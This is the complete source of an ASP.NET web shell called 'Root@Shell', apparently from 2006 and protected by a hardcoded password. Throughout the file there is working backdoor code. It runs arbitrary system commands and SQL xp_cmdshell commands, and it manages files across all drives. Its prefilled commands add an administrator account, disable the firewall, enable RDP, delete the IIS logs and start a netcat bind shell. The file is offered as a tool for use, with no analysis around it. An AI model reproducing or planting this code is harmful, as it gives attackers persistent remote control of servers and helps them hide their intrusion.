<%@ Page Language="VB" ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<script runat="server">
Dim PASSWORD as string = "mima"
'----------------------------------------------------------------------------------------------------------------
'----------------- Root@Shell by Silentz -----------------
'----------------- E-mail: bartsimpson912@hotmail.com -----------------
'----------------- http://www.team-rootshell.com -----------------
'----------------- IRC: ABS.lcirc.net or irc.milw0rm.com -----------------
'----------------- Channel: #rootshell -----------------
'----------------- -----------------
'----------------- Version 1.0 -----------------
'----------------- ` Build (04/10/06) -----------------
'----------------- -----------------
'----------------- Shoutz: Preddy, Stansar, IronFist and all my other RootShell Peepz -----------------
'----------------- -----------------
'----------------------------------------------------------------------------------------------------------------
dim url,TEMP1,TEMP2,TITLE as string
Sub Login_click(sender As Object, E As EventArgs)
if Textbox.Text=PASSWORD then
session("rootshell")=1
session.Timeout=45
else
response.Write("<font color='red'>Your password is incorrect! Please check your password and try again.</font><br>")
end if
End Sub
Sub RunCMD(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo("cmd.exe")
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments="/c " & Cmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,">","<")
mystring=replace(mystring,"<",">")
result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
Cmd.text=""
End Sub
Sub RunCMD2(Src As Object, E As EventArgs)
Dim myProcess2 As New Process()
Dim myProcessStartInfo2 As New ProcessStartInfo("cmd.exe")
myProcessStartInfo2.UseShellExecute = False
myProcessStartInfo2.RedirectStandardOutput = true
myProcess2.StartInfo = myProcessStartInfo2
myProcessStartInfo2.Arguments="/c " & Cmd2.text
myProcess2.Start()
Dim myStreamReader2 As StreamReader = myProcess2.StandardOutput
Dim myString2 As String = myStreamReader2.Readtoend()
myProcess2.Close()
mystring2=replace(mystring2,">","<")
mystring2=replace(mystring2,"<",">")
result.text=Cmd2.text & vbcrlf & "<pre>" & mystring2 & "</pre>"
Cmd2.text=""
End Sub
Sub RunCMD3(Src As Object, E As EventArgs)
Dim myProcess3 As New Process()
Dim myProcessStartInfo3 As New ProcessStartInfo("cmd.exe")
myProcessStartInfo3.UseShellExecute = False
myProcessStartInfo3.RedirectStandardOutput = true
myProcess3.StartInfo = myProcessStartInfo3
myProcessStartInfo3.Arguments="/c " & Cmd3.text
myProcess3.Start()
Dim myStreamReader3 As StreamReader = myProcess3.StandardOutput
Dim myString3 As String = myStreamReader3.Readtoend()
myProcess3.Close()
mystring3=replace(mystring3,">","<")
mystring3=replace(mystring3,"<",">")
result.text=Cmd3.text & vbcrlf & "<pre>" & mystring3 & "</pre>"
Cmd3.text=""
End Sub
Sub RunCMD4(Src As Object, E As EventArgs)
Dim myProcess4 As New Process()
Dim myProcessStartInfo4 As New ProcessStartInfo("cmd.exe")
myProcessStartInfo4.UseShellExecute = False
myProcessStartInfo4.RedirectStandardOutput = true
myProcess4.StartInfo = myProcessStartInfo4
myProcessStartInfo4.Arguments="/c " & Cmd4.text
myProcess4.Start()
Dim myStreamReader4 As StreamReader = myProcess4.StandardOutput
Dim myString4 As String = myStreamReader4.Readtoend()
myProcess4.Close()
mystring4=replace(mystring4,">","<")
mystring4=replace(mystring4,"<",">")
result.text=Cmd4.text & vbcrlf & "<pre>" & mystring4 & "</pre>"
Cmd4.text=""
End Sub
Sub RunCMD5(Src As Object, E As EventArgs)
Dim myProcess5 As New Process()
Dim myProcessStartInfo5 As New ProcessStartInfo("cmd.exe")
myProcessStartInfo5.UseShellExecute = False
myProcessStartInfo5.RedirectStandardOutput = true
myProcess5.StartInfo = myProcessStartInfo5
myProcessStartInfo5.Arguments="/c " & Cmd5.text
myProcess5.Start()
Dim myStreamReader5 As StreamReader = myProcess5.StandardOutput
Dim myString5 As String = myStreamReader5.Readtoend()
myProcess5.Close()
mystring5=replace(mystring5,">","<")
mystring5=replace(mystring5,"<",">")
result.text=Cmd5.text & vbcrlf & "<pre>" & mystring5 & "</pre>"
Cmd5.text=""
End Sub
Sub RunCMD6(Src As Object, E As EventArgs)
Dim myProcess6 As New Process()
Dim myProcessStartInfo6 As New ProcessStartInfo("cmd.exe")
myProcessStartInfo6.UseShellExecute = False
myProcessStartInfo6.RedirectStandardOutput = true
myProcess6.StartInfo = myProcessStartInfo6
myProcessStartInfo6.Arguments="/c " & Cmd6.text
myProcess6.Start()
Dim myStreamReader6 As StreamReader = myProcess6.StandardOutput
Dim myString6 As String = myStreamReader6.Readtoend()
myProcess6.Close()
mystring6=replace(mystring6,">","<")
mystring6=replace(mystring6,"<",">")
result.text=Cmd6.text & vbcrlf & "<pre>" & mystring6 & "</pre>"
Cmd6.text=""
End Sub
Sub RunCMD7(Src As Object, E As EventArgs)
Dim myProcess7 As New Process()
Dim myProcessStartInfo7 As New ProcessStartInfo("cmd.exe")
myProcessStartInfo7.UseShellExecute = False
myProcessStartInfo7.RedirectStandardOutput = true
myProcess7.StartInfo = myProcessStartInfo7
myProcessStartInfo7.Arguments="/c " & Cmd7.text
myProcess7.Start()
Dim myStreamReader7 As StreamReader = myProcess7.StandardOutput
Dim myString7 As String = myStreamReader7.Readtoend()
myProcess7.Close()
mystring7=replace(mystring7,">","<")
mystring7=replace(mystring7,"<",">")
result.text=Cmd7.text & vbcrlf & "<pre>" & mystring7 & "</pre>"
Cmd7.text=""
End Sub
sub Editor(Src As Object, E As EventArgs)
dim mywrite as new streamwriter(filepath.text,false,encoding.default)
mywrite.write(content.text)
mywrite.close
response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"/","//") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
end sub
Sub UpLoad(Src As Object, E As EventArgs)
dim filename,loadpath as string
filename=path.getfilename(UpFile.value)
loadpath=request.QueryString("src") & filename
if file.exists(loadpath)=true then
response.Write("<script>alert('File " & replace(loadpath,"/","//") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
response.End()
end if
UpFile.postedfile.saveas(loadpath)
response.Write("<script>alert('File " & filename & " upload success!/nFile info:/n/nClient Path:" & replace(UpFile.value,"/","//") & "/nFile Size:" & UpFile.postedfile.contentlength & " bytes/nSave Path:" & replace(loadpath,"/","//") & "/n');")
response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
End Sub
Sub NewFD(Src As Object, E As EventArgs)
url=request.form("src")
if NewFile.Checked = True then
dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
mywrite.close
response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
else
directory.createdirectory(url & NewName.Text)
response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"/","//") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
end if
End Sub
Sub del(a)
if right(a,1)="/" then
dim xdir as directoryinfo
dim mydir as new DirectoryInfo(a)
dim xfile as fileinfo
for each xfile in mydir.getfiles()
file.delete(a & xfile.name)
next
for each xdir in mydir.getdirectories()
call del(a & xdir.name & "/")
next
directory.delete(a)
else
file.delete(a)
end if
End Sub
Sub copydir(a,b)
dim xdir as directoryinfo
dim mydir as new DirectoryInfo(a)
dim xfile as fileinfo
for each xfile in mydir.getfiles()
file.copy(a & "/" & xfile.name,b & xfile.name)
next
for each xdir in mydir.getdirectories()
directory.createdirectory(b & path.getfilename(a & xdir.name))
call copydir(a & xdir.name & "/",b & xdir.name & "/")
next
End Sub
Sub xexistdir(temp,ow)
if directory.exists(temp)=true or file.exists(temp)=true then
if ow=0 then
response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
elseif ow=1 then
del(temp)
else
dim d as string = session("cutboard")
if right(d,1)="/" then
TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
else
TEMP2=url & second(now) & replace(path.getfilename(d),"","")
end if
end if
end if
End Sub
Sub existdir(temp)
if file.exists(temp)=false and directory.exists(temp)=false then
response.Write("<center>This drive is not an accessible drive...</center>")
response.End()
end if
End Sub
Sub RunSQLCMD(Src As Object, E As EventArgs)
Dim adoConn,strQuery,recResult,strResult
if SqlName.Text<>"" then
adoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
If Sqlcmd.Text<>"" Then
strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
recResult = adoConn.Execute(strQuery)
If NOT recResult.EOF Then
Do While NOT recResult.EOF
strResult = strResult & chr(13) & recResult(0).value
recResult.MoveNext
Loop
End if
recResult = Nothing
strResult = Replace(strResult," "," ")
strResult = Replace(strResult,"<","<")
strResult = Replace(strResult,">",">")
resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
SqlCMD.Text=""
End if
adoConn.Close
End if
End Sub
Function GetStartedTime(ms)
GetStartedTime=cint(ms/(1000*60*60))
End function
Function getIP()
Dim strIPAddr as string
If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
strIPAddr = Request.ServerVariables("REMOTE_ADDR")
ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
Else
strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
End If
getIP = Trim(Mid(strIPAddr, 1, 30))
End Function
Function Getparentdir(nowdir)
dim temp,k as integer
temp=1
k=0
if len(nowdir)>4 then
nowdir=left(nowdir,len(nowdir)-1)
end if
do while temp<>0
k=temp+1
temp=instr(temp,nowdir,"/")
if temp =0 then
exit do
end if
temp = temp+1
loop
if k<>2 then
getparentdir=mid(nowdir,1,k-2)
else
getparentdir=nowdir
end if
End function
Function Rename()
url=request.QueryString("src")
if file.exists(Getparentdir(url) & request.Form("name")) then
rename=0
else
file.copy(url,Getparentdir(url) & request.Form("name"))
del(url)
rename=1
end if
End Function
Function GetSize(temp)
if temp < 1024 then
GetSize=temp & " bytes"
else
if temp/1024 < 1024 then
GetSize=temp/1024 & " KB"
else
if temp/1024/1024 < 1024 then
GetSize=temp/1024/1024 & " MB"
else
GetSize=temp/1024/1024/1024 & " GB"
end if
end if
end if
End Function
Sub downTheFile(thePath)
dim stream
stream=server.createObject("adodb.stream")
stream.open
stream.type=1
stream.loadFromFile(thePath)
response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
response.addHeader("Content-Length",stream.Size)
response.charset="UTF-8"
response.contentType="application/octet-stream"
response.binaryWrite(stream.read)
response.flush
stream.close
stream=nothing
response.End()
End Sub
</script>
<%
if request.QueryString("action")="down" and session("rootshell")=1 then
downTheFile(request.QueryString("src"))
response.End()
end if
Dim hu as string = request.QueryString("action")
if hu="cmd" then
TITLE="CMD.NET"
elseif hu="sqlrootkit" then
TITLE="SqlRootKit.NET"
elseif hu="clonetime" then
TITLE="Clone Time"
elseif hu="information" then
TITLE="Web Server Info"
elseif hu="goto" then
TITLE="Root@Shell::2006"
else
TITLE=request.ServerVariables("HTTP_HOST")
end if
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<style type="text/css">
body,td,th {
color: #FFFFFF;
font-family: Comic Sans Ms;
}
body {
background-image: url("http://img526.imageshack.us/img526/9563/rootshell3ek5mh2.png");
background-position: center center;
background-repeat: no-repeat;
background-color: #000000;
background-attachment: fixed;
font-family: Comic Sans MS;
font-size: 16px;
}
a:link {
color: #FFFFFF;
text-decoration: none;
}
a:visited {
text-decoration: none;
color: #FFFFFF;
}
a:hover {
text-decoration: none;
color: #00FF00;
}
a:active {
text-decoration: none;
color: #00FF00;
}
.button {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.style3 {color: #00FF00}
.text {font-family: Comic Sans MS; font-size: 18px}
.title {font-family: Comic Sans MS; font-size: 22px;}
.footer {font-size: 12px;}
</style>
<head>
<meta http-equiv="Content-Type" content="text/html">
<title>Root@Shell 1.0 By Silentz</title>
</head>
<body>
<%
Dim error_x as Exception
Try
if session("rootshell")<>1 then
response.Write("<br>")
response.Write("<center><span class=""title""><b>Welcome to Root@Shell</b></span></center><br>")
response.Write("<center><span class=""style3"">Note:</span> You MUST click the login button and not hit enter.</center>")
%>
<form runat="server">
<br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<center>Password:<asp:TextBox ID="TextBox" runat="server" TextMode="Password" class="TextBox" />
<asp:Button ID="Button" runat="server" Text="Login" ToolTip="Click here to login" OnClick="login_click" class="button" /></center>
</form>
<%
else
dim temp as string
temp=request.QueryString("action")
if temp="" then temp="goto"
select case temp
case "goto"
if request.QueryString("src")<>"" then
url=request.QueryString("src")
else
url=server.MapPath(".") & "/"
end if
call existdir(url)
dim xdir as directoryinfo
dim mydir as new DirectoryInfo(url)
dim hupo as string
dim xfile as fileinfo
%>
<p align="center">Current Directory: <font color= #00FF00><%=url%></font></p>
<table width="75%" border="0" align="center">
<tr>
<td width="13%">Action:</td>
<td width="87%">
<a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> |
<a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file"> Upload</a> |
<a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory"> Index Root</a> |
<a href="?action=logout" title="Exit"> Exit</a></td>
</tr>
<tr>
<td>
Drive: </td>
<td>
<%
dim i as integer
for i =0 to Directory.GetLogicalDrives().length-1
response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
next
%>
</td>
</tr>
<tr>
<td>Tools:</td>
<td><a href="?action=sqlrootkit" target="_blank">SQL Command</a> |<a href="?action=cmd" target="_blank"> Command Line</a> |<a href="?action=information" target="_blank"> System Information</a></td>
</tr>
<tr>
<td width="20%">Admin Tricks: </td>
<td width="80%"><a href="?action=cmd5" target="_blank">Add User</a> |<a href="?action=cmd6" target="_blank"> Add User To Administrators Group</a> |<a href="?action=cmd7" target="_blank"> Disable Windows Firewall</a> |<a href="?action=cmd4" target="_blank"> Enable RDP</a> |<a href="?action=cmd3" target="_blank"> Wipe IIS Logs</a></td>
</tr>
<tr>
<td width="20%">Silentz's Tricks: </td>
<td width="80%"><a href="?action=cmd2" target="_blank">Start NC</a></td>
</tr>
</table>
<hr noshade width="70%">
<table width="90%" border="0" align="center">
<tr>
<td width="30%"><strong>Name</strong></td>
<td width="10%"><strong>Size</strong></td>
<td width="20%"><strong>Last Modified</strong></td>
<td width="25%"><strong>Action</strong></td>
</tr>
<tr>
<td><%
hupo= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
response.Write(hupo)
for each xdir in mydir.getdirectories()
response.Write("<tr>")
dim filepath as string
filepath=server.UrlEncode(url & xdir.name)
hupo= "<td><a href='?action=goto&src=" & filepath & "/" & "'>" & xdir.name & "</a></td>"
response.Write(hupo)
response.Write("<td><dir></td>")
response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
hupo="<td><a href='?action=cut&src=" & filepath & "/' target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "/' target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "/'" & " οnclick='return del(this);'>Del</a></td>"
response.Write(hupo)
response.Write("</tr>")
next
%></td>
</tr>
<tr>
<td><%
for each xfile in mydir.getfiles()
dim filepath2 as string
filepath2=server.UrlEncode(url & xfile.name)
response.Write("<tr>")
hupo="<td>" & xfile.name & "</td>"
response.Write(hupo)
hupo="<td>" & GetSize(xfile.length) & "</td>"
response.Write(hupo)
response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
hupo="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"
response.Write(hupo)
response.Write("</tr>")
next
response.Write("</table>")
%></td>
</tr>
<tr>
<td><hr noshade width="70%"></td>
</tr>
</table>
<script language="javascript">
function del()
{
if(confirm("Are you sure?")){return true;}
else{return false;}
}
function down()
{
if(confirm("If the file size > 20M,/nPlease don/'t download/nYou can copy file to web directory ,use http download/nAre you sure download?")){return true;}
else{return false;}
}
</script>
<%
case "information"
dim CIP,CP as string
if getIP()<>request.ServerVariables("REMOTE_ADDR") then
CIP=getIP()
CP=request.ServerVariables("REMOTE_ADDR")
else
CIP=request.ServerVariables("REMOTE_ADDR")
CP="None"
end if
%>
<center><p>[ System information ]</p><br/>
<table width="80%" border="1" align="center">
<tr>
<td colspan="2"><span class="style3"><b>Web Server Information</b></span></td>
</tr>
<tr>
<td width="40%">Server IP</td>
<td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
</tr>
<tr>
<td height="73">Machine Name</td>
<td><%=Environment.MachineName%></td>
</tr>
<tr>
<td>Network Name</td>
<td><%=Environment.UserDomainName.ToString()%></td>
</tr>
<tr>
<td>User Name in this Process</td>
<td><%=Environment.UserName%></td>
</tr>
<tr>
<td>OS Version</td>
<td><%=Environment.OSVersion.ToString()%></td>
</tr>
<tr>
<td>Started Time</td>
<td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
</tr>
<tr>
<td>System Time</td>
<td><%=now%></td>
</tr>
<tr>
<td>IIS Version</td>
<td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
</tr>
<tr>
<td>HTTPS</td>
<td><%=request.ServerVariables("HTTPS")%></td>
</tr>
<tr>
<td>PATH_INFO</td>
<td><%=request.ServerVariables("PATH_INFO")%></td>
</tr>
<tr>
<td>PATH_TRANSLATED</td>
<td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
<tr>
<td>SERVER_PORT</td>
<td><%=request.ServerVariables("SERVER_PORT")%></td>
</tr>
<tr>
<td>SeesionID</td>
<td><%=Session.SessionID%></td>
</tr>
<tr>
<td colspan="2"><span class="style3"><b>Client Infomation</b></span></td>
</tr>
<tr>
<td>Client Proxy</td>
<td><%=CP%></td>
</tr>
<tr>
<td>Client IP</td>
<td><%=CIP%></td>
</tr>
<tr>
<td>User</td>
<td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
</tr>
</table>
<%
case "cmd"
%>
<form runat="server">
<center><p>[ Command Prompt ]</p>
<p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
Command:
<asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
<asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="button"/></center>
<p>
<asp:Label ID="result" runat="server" style="style2"/></p>
</form>
<%
case "cmd2"
%>
<form runat="server">
<center><p>[ Command Prompt ]</p>
<p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
Command:
<asp:TextBox ID="cmd2" runat="server" Width="300" class="TextBox" text="nc -l -v -p 12345 -d -e cmd.exe"/>
<asp:Button ID="Button1234" runat="server" Text="Run" OnClick="RunCMD2" class="button" /></center>
<p>
<asp:Label ID="result2" runat="server" style="style2"/></p>
</form>
<%
case "cmd3"
%>
<form runat="server">
<center><p>[ Command Prompt ]</p>
<p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
Command:
<asp:TextBox ID="cmd3" runat="server" Width="300" class="TextBox" text="del C:/WINDOWS/system32/LogFiles/W3SVC1/*.log"/>
<asp:Button ID="Button12345" runat="server" Text="Run" OnClick="RunCMD3" class="button" /></center>
<p>
<asp:Label ID="result3" runat="server" style="style2"/></p>
</form>
<%
case "cmd4"
%>
<form runat="server">
<center><p>[ Command Prompt ]</p>
<p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
Command:
<asp:TextBox ID="cmd4" runat="server" Width="300" class="TextBox" text="reg add hklm/system/currentControlSet/Control/Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0x0 /f"/>
<asp:Button ID="Button123456" runat="server" Text="Run" OnClick="RunCMD4" class="button" /></center>
<p>
<asp:Label ID="result4" runat="server" style="style2"/></p>
</form><%
case "cmd5"
%>
<form runat="server">
<center><p>[ Command Prompt ]</p>
<p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
Command:
<asp:TextBox ID="cmd5" runat="server" Width="300" class="TextBox" text="net user USERNAME PASSWORD /add"/>
<asp:Button ID="Button1234567" runat="server" Text="Run" OnClick="RunCMD5" class="button" /></center>
<p>
<asp:Label ID="result5" runat="server" style="style2"/></p>
</form>
<%
case "cmd6"
%>
<form runat="server">
<center><p>[ Command Prompt ]</p>
<p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
Command:
<asp:TextBox ID="cmd6" runat="server" Width="300" class="TextBox" text="net localgroup Administrators USERNAME /add"/>
<asp:Button ID="Button12345678" runat="server" Text="Run" OnClick="RunCMD6" class="button" /></center>
<p>
<asp:Label ID="result6" runat="server" style="style2"/></p>
</form>
<%
case "cmd7"
%>
<form runat="server">
<center><p>[ Command Prompt ]</p>
<p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
Command:
<asp:TextBox ID="cmd7" runat="server" Width="300" class="TextBox" text="reg add HKLM/SYSTEM/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile /v EnableFirewall /t REG_DWORD /d 0x0 /f"/>
<asp:Button ID="Button123456789" runat="server" Text="Run" OnClick="RunCMD7" class="button" /></center>
<p>
<asp:Label ID="result7" runat="server" style="style2"/></p>
</form>
<%
case "sqlrootkit"
%>
<form runat="server">
<center><p>[ SQL Command ]</p>
<p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
<p>SQL Host:
<asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
<p>
SQL Username:
<asp:TextBox ID="SqlName" runat="server" Width="110" class="TextBox" Text='Username'/><br/>
SQL Password:
<asp:TextBox ID="SqlPass" runat="server" Width="110" class="TextBox" Text='Password'/>
</p>
Command:
<asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
<asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="button"/>
<p>
<asp:Label ID="resultSQL" runat="server" style="style2"/></p></center>
</form>
<%
case "del"
dim a as string
a=request.QueryString("src")
call existdir(a)
call del(a)
response.Write("<script>alert(""Delete " & replace(a,"/","//") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
case "copy"
call existdir(request.QueryString("src"))
session("cutboard")="" & request.QueryString("src")
response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
case "cut"
call existdir(request.QueryString("src"))
session("cutboard")="" & request.QueryString("src")
response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
case "plaster"
dim ow as integer
if request.Form("OverWrite")<>"" then ow=1
if request.Form("Cancel")<>"" then ow=2
url=request.QueryString("src")
call existdir(url)
dim d as string
d=session("cutboard")
if left(d,1)="" then
TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
TEMP2=url & replace(path.getfilename(d),"","")
if right(d,1)="/" then
call xexistdir(TEMP1,ow)
directory.move(replace(d,"",""),TEMP1 & "/")
response.Write("<script>alert('Cut " & replace(replace(d,"",""),"/","//") & " to " & replace(TEMP1 & "/","/","//") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
else
call xexistdir(TEMP2,ow)
file.move(replace(d,"",""),TEMP2)
response.Write("<script>alert('Cut " & replace(replace(d,"",""),"/","//") & " to " & replace(TEMP2,"/","//") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
end if
else
TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
TEMP2=url & path.getfilename(replace(d,"",""))
if right(d,1)="/" then
call xexistdir(TEMP1,ow)
directory.createdirectory(TEMP1)
call copydir(replace(d,"",""),TEMP1 & "/")
response.Write("<script>alert('Copy " & replace(replace(d,"",""),"/","//") & " to " & replace(TEMP1 & "/","/","//") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
else
call xexistdir(TEMP2,ow)
file.copy(replace(d,"",""),TEMP2)
response.Write("<script>alert('Copy " & replace(replace(d,"",""),"/","//") & " to " & replace(TEMP2,"/","//") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
end if
end if
case "upfile"
url=request.QueryString("src")
%>
<form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server" onSubmit="return checkname();">
<center>Files will be uploaded to: <span class="style3"><%=url%></span><br>
Upload:
<input name="upfile" type="file" class="TextBox" id="UpFile" runat="server"><br><br>
<input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="button"></center>
</form>
<%
case "new"
url=request.QueryString("src")
%>
<form runat="server">
<center><%=url%><br>
Name:
<asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
<br>
<asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
<asp:RadioButton ID="NewDirectory" Text="Directory" runat="server" GroupName="New"/>
<br><br>
<asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="button" OnClick="NewFD"/>
<input name="Src" type="hidden" value="<%=url%>"></center>
</form>
<%
case "edit"
dim b as string
b=request.QueryString("src")
call existdir(b)
dim myread as new streamreader(b,encoding.default)
filepath.text=b
content.text=myread.readtoend
%>
<form runat="server">
<table width="80%" border="1" align="center">
<tr> <td width="11%">Path</td>
<td width="89%">
<asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
*</td>
</tr>
<tr>
<td>Content</td>
<td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
</tr>
<tr>
<td></td>
<td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="button"/>
</td>
</tr>
</table>
</form>
<%
myread.close
case "rename"
url=request.QueryString("src")
if request.Form("name")="" then
%>
<form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
<center><p>You wish to rename <span class="style3"><%=request.QueryString("src")%></span> to: <%=getparentdir(request.QueryString("src"))%>
<input type="text" name="name" class="TextBox"><br><br>
<input type="submit" name="Submit3" value="Submit" class="button">
</p></center>
</form>
<script language="javascript">
function checkname()
{
if(formRn.name.value==""){alert("You shall input filename :(");return false}
}
</script>
<%
else
if Rename() then
response.Write("<script>alert('Rename " & replace(url,"/","//") & " to " & replace(Getparentdir(url) & request.Form("name"),"/","//") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
else
response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
end if
end if
case "samename"
url=request.QueryString("src")
%>
<form name="form1" method="post" action="?action=plaster&src=<%=server.UrlEncode(url)%>">
<p class="style3">Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)</p>
<input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="button">
<input name="Cancel" type="submit" id="Cancel" value="No" class="button">
</form>
<p>
<%
case "logout"
session.Abandon()
response.Write("<center>Have a nice day...</center>")
response.Write("<script>alert(' Goodbye !');location.href='rootshell.aspx" & request.ServerVariables("URL") & "';</sc" & "ript>")
end select
end if
Catch error_x
response.Write("<br/><center><font color=""red""></font></center>")
End Try
%>
</p>
<script language="javascript">
function closewindow()
{self.close();}
</script>
<b><p align="center" valign="bottom" class="footer">Root@Shell 1.0 • 2006<br/>
By Silentz Of <a href="http://www.team-rootshell.com" target="_blank" title="Welcome to RootShell"> RootShell Security Team</a> • ABS.lcirc.net #rootshell</p></b>
</body>
</html>